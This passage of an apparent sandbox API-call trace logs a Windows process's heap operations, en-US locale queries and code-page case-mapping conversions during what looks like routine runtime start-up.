Size=0x18) returned 0x625e08 [0166.964] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x46) returned 0x650110 [0166.964] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6722d0 | out: hHeap=0x5d0000) returned 1 [0166.964] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x80) returned 0x634768 [0166.964] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x800) returned 0x5d07f0 [0166.965] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0166.965] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.966] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.966] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.966] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x66ed38 [0166.966] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x66f5f0 [0166.967] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2) returned 0x66ed58 [0166.967] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66ed58 | out: hHeap=0x5d0000) returned 1 [0166.967] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2) returned 0x66ed58 [0166.967] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.967] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x66ed68 [0166.968] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x625e28 [0166.968] GetLastError () returned 0x0 [0166.968] SetLastError (dwErrCode=0x0) [0166.968] GetLastError () returned 0x0 [0166.968] SetLastError (dwErrCode=0x0) [0166.969] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb8) returned 0x650ba8 [0166.969] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6a6) returned 0x6722d0 [0166.969] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6722d0 | out: hHeap=0x5d0000) returned 1 [0166.969] GetLastError () returned 0x0 [0166.970] SetLastError (dwErrCode=0x0) [0166.970] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x66ed78 [0166.970] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2) returned 0x66ed88 [0166.970] GetLastError () returned 0x0 [0166.970] SetLastError (dwErrCode=0x0) [0166.970] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66ed98 [0166.970] GetLastError () returned 0x0 [0166.970] SetLastError (dwErrCode=0x0) [0166.970] GetLastError () returned 0x0 [0166.970] SetLastError (dwErrCode=0x0) [0166.970] GetLastError () returned 0x0 [0166.970] SetLastError (dwErrCode=0x0) [0166.970] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb8) returned 0x64a3a0 [0166.970] GetLastError () returned 0x0 [0166.970] SetLastError (dwErrCode=0x0) [0166.970] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6a6) returned 0x6722d0 [0166.970] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6722d0 | out: hHeap=0x5d0000) returned 1 [0166.970] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66ed78 | out: hHeap=0x5d0000) returned 1 [0166.970] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x650ba8 | out: hHeap=0x5d0000) returned 1 [0166.970] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66ed98 | out: hHeap=0x5d0000) returned 1 [0166.970] GetLastError () returned 0x0 [0166.970] SetLastError (dwErrCode=0x0) [0166.971] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x66ed98 [0166.971] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2) returned 0x66ed78 [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.971] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x200) returned 0x639918 [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.971] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66eda8 [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.971] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb8) returned 0x650ba8 [0166.971] GetLastError () returned 0x0 [0166.971] SetLastError (dwErrCode=0x0) [0166.972] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6a6) returned 0x6722d0 [0166.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6722d0 | out: hHeap=0x5d0000) returned 1 [0166.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66ed98 | out: hHeap=0x5d0000) returned 1 [0166.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x64a3a0 | out: hHeap=0x5d0000) returned 1 [0166.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66eda8 | out: hHeap=0x5d0000) returned 1 [0166.972] GetLastError () returned 0x0 [0166.972] SetLastError (dwErrCode=0x0) [0166.972] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x66eda8 [0166.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66ed78 | out: hHeap=0x5d0000) returned 1 [0166.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66ed88 | out: hHeap=0x5d0000) returned 1 [0166.972] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x66ed88 [0166.972] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.972] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.973] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.973] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.973] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.974] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.974] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.974] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x634768) returned 0x80 [0166.975] GetLastError () returned 0x0 [0166.975] SetLastError (dwErrCode=0x0) [0166.975] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x66ed78 [0166.975] GetLastError () returned 0x0 [0166.975] SetLastError (dwErrCode=0x0) [0166.975] GetLastError () returned 0x0 [0166.975] SetLastError (dwErrCode=0x0) [0166.975] GetLastError () returned 0x0 [0166.975] SetLastError (dwErrCode=0x0) [0166.975] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb8) returned 0x64a3a0 [0166.975] GetLastError () returned 0x0 [0166.975] SetLastError (dwErrCode=0x0) [0166.975] GetLastError () returned 0x0 [0166.975] SetLastError (dwErrCode=0x0) [0166.975] GetUserDefaultLocaleName (in: lpLocaleName=0x14e990, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0166.976] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20001004, lpLCData=0x14ea44, cchData=2 | out: lpLCData="Ӥ") returned 2 [0166.976] IsValidCodePage (CodePage=0x4e4) returned 1 [0166.976] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1001, lpLCData=0x14ea9c, cchData=64 | out: lpLCData="English") returned 8 [0166.976] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1002, lpLCData=0x14eb1c, cchData=64 | out: lpLCData="United States") returned 14 [0166.976] GetLastError () returned 0x0 [0166.977] SetLastError (dwErrCode=0x0) [0166.977] GetLastError () returned 0x0 [0166.977] SetLastError (dwErrCode=0x0) [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3a) returned 0x64c448 [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6430a8 [0166.977] GetLastError () returned 0x0 [0166.977] SetLastError (dwErrCode=0x0) [0166.977] GetLastError () returned 0x0 [0166.977] SetLastError (dwErrCode=0x0) [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3a) returned 0x64c400 [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6430f0 [0166.977] GetLastError () returned 0x0 [0166.977] SetLastError (dwErrCode=0x0) [0166.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x9, lpMultiByteStr=0x64f811f8, cbMultiByte=127, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 127 [0166.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x64f811f8, cbMultiByte=127, lpWideCharStr=0x14e818, cchWideChar=127 | out: lpWideCharStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f") returned 127 [0166.977] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f", cchSrc=127, lpCharType=0x14ea6c | out: lpCharType=0x14ea6c) returned 1 [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x66ed98 [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x300) returned 0x644758 [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x180) returned 0x63dec8 [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x180) returned 0x6474e0 [0166.977] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x101) returned 0x640e70 [0166.977] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14e960 | out: lpCPInfo=0x14e960) returned 1 [0166.977] GetLastError () returned 0x0 [0166.977] SetLastError (dwErrCode=0x0) [0166.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x640e71, cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x640e71, cbMultiByte=255, lpWideCharStr=0x14e6a8, cchWideChar=255 | out: lpWideCharStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 255 [0166.978] LCMapStringEx (in: lpLocaleName="en-US", dwMapFlags=0x100, lpSrcStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=255, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 255 [0166.978] LCMapStringEx (in: lpLocaleName="en-US", dwMapFlags=0x100, lpSrcStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=255, lpDestStr=0x14e498, cchDest=255, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 255 [0166.978] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchWideChar=255, lpMultiByteStr=0x63df49, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÑ6}IÈâ", lpUsedDefaultChar=0x0) returned 255 [0166.978] GetLastError () returned 0x0 [0166.978] SetLastError (dwErrCode=0x0) [0166.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x640e71, cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x640e71, cbMultiByte=255, lpWideCharStr=0x14e6a8, cchWideChar=255 | out: lpWideCharStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 255 [0166.978] LCMapStringEx (in: lpLocaleName="en-US", dwMapFlags=0x200, lpSrcStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=255, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 255 [0166.978] LCMapStringEx (in: lpLocaleName="en-US", dwMapFlags=0x200, lpSrcStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=255, lpDestStr=0x14e498, cchDest=255, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ") returned 255 [0166.978] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ", cchWideChar=255, lpMultiByteStr=0x647561, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fÈ7tXÈâ", lpUsedDefaultChar=0x0) returned 255 [0166.978] GetLastError () returned 0x0 [0166.978] SetLastError (dwErrCode=0x0) [0166.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x640e70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x640e70, cbMultiByte=256, lpWideCharStr=0x14e6b8, cchWideChar=256 | out: lpWideCharStr="") returned 256 [0166.978] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=256, lpCharType=0x644858 | out: lpCharType=0x644858) returned 1 [0166.978] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x640e70 | out: hHeap=0x5d0000) returned 1 [0166.978] GetLastError () returned 0x0 [0166.978] SetLastError (dwErrCode=0x0) [0166.978] GetLastError () returned 0x0 [0166.978] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x15, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.978] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x15, lpLCData=0x14e838, cchData=4 | out: lpLCData="USD") returned 4 [0166.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="USD", cchWideChar=-1, lpMultiByteStr=0x14e8b8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USD", lpUsedDefaultChar=0x0) returned 4 [0166.979] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66edd8 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x14, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x14, lpLCData=0x14e828, cchData=2 | out: lpLCData="$") returned 2 [0166.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=-1, lpMultiByteStr=0x14e8a4, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$", lpUsedDefaultChar=0x0) returned 2 [0166.979] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x66ede8 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x16, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x16, lpLCData=0x14e808, cchData=2 | out: lpLCData=".") returned 2 [0166.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=-1, lpMultiByteStr=0x14e890, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".", lpUsedDefaultChar=0x0) returned 2 [0166.979] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x66edf8 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x17, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x17, lpLCData=0x14e7f8, cchData=2 | out: lpLCData=",") returned 2 [0166.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x14e87c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0166.979] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x66ee08 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x18, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x18, lpLCData=0x14e838, cchData=4 | out: lpLCData="3;0") returned 4 [0166.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3;0", cchWideChar=-1, lpMultiByteStr=0x14e8b8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3;0", lpUsedDefaultChar=0x0) returned 4 [0166.979] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66ee18 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x50, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 1 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x50, lpLCData=0x14e828, cchData=1 | out: lpLCData="") returned 1 [0166.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=-1, lpMultiByteStr=0x14e8a4, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0166.979] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1) returned 0x66ee28 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x51, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.979] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x51, lpLCData=0x14e808, cchData=2 | out: lpLCData="-") returned 2 [0166.980] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="-", cchWideChar=-1, lpMultiByteStr=0x14e890, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 2 [0166.980] 